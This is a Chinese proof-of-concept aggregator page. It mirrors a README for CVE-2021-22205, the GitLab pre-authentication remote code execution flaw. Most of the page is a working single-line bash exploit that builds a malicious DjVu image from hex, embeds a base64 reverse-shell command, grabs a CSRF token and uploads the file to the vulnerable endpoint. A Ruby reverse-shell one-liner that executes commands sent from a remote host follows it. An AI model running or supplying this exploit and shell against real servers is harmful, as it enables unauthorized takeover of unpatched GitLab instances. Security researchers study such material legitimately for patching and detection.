POC详情: 1fee3fb432c3df3b0fb479a76c3a3b340067006b

来源
https://github.com/findneo/GitLab-preauth-RCE_CVE-2021-22205
关联漏洞
标题: GitLab 代码注入漏洞 (CVE-2021-22205)
描述:GitLab是美国GitLab公司的一个开源的端到端软件开发平台,具有内置的版本控制、问题跟踪、代码审查、CI/CD(持续集成和持续交付)等功能。 Gitlab Community Edition 存在代码注入漏洞,该漏洞源于图像解析器在处理图像文件时输入验证不正确。以下产品及版本受到影响::Gitlab Community Edition: 11.9.0, 11.9.1, 11.9.2, 11.9.3, 11.9.4, 11.9.5, 11.9.6, 11.9.7, 11.9.8, 11.9.9, 11
描述
PoC in single line bash
介绍
# GitLab-preauth-RCE_CVE-2021-22205

single line bash PoC for GitLab preauth RCE ( CVE-2021-22205 )

```bash
t="http://vuln.site";cmd='echo xxx_base64_of_reverse_shell_code_xxx |base64 -d|bash';f="1.jpg";echo 41542654464f524d000003af444a564d4449524d0000002e81000200000046000000acffffdebf992021c8914eeb0c071fd2da88e86be6440f2c7102ee49d36e95bda2c3223f464f524d0000005e444a5655494e464f0000000a00080008180064001600494e434c0000000f7368617265645f616e6e6f2e696666004247343400000011004a0102000800088ae6e1b137d97f2a89004247343400000004010ff99f4247343400000002020a464f524d00000307444a5649414e546100000150286d657461646174610a0928436f7079726967687420225c0a22202e2071787b|xxd -p -r>$f;echo -n $cmd>>$f;echo 7d202e205c0a222062202229202920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020|xxd -p -r>>$f;curl -b c -c c -XPOST $t/uploads/user -H "X-CSRF-Token: $(curl -b c -c c -s "$t/users/sign_in" |grep -Po '(?<=csrf-token" content=")([^"]*)')" -F "file=@$f"
```

code for reverse shell
```
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("127.0.0.1",8080);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```

ref:

https://hackerone.com/reports/1154542
文件快照

 [4.0K]  /data/pocs/1fee3fb432c3df3b0fb479a76c3a3b340067006b
└── [1.9K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。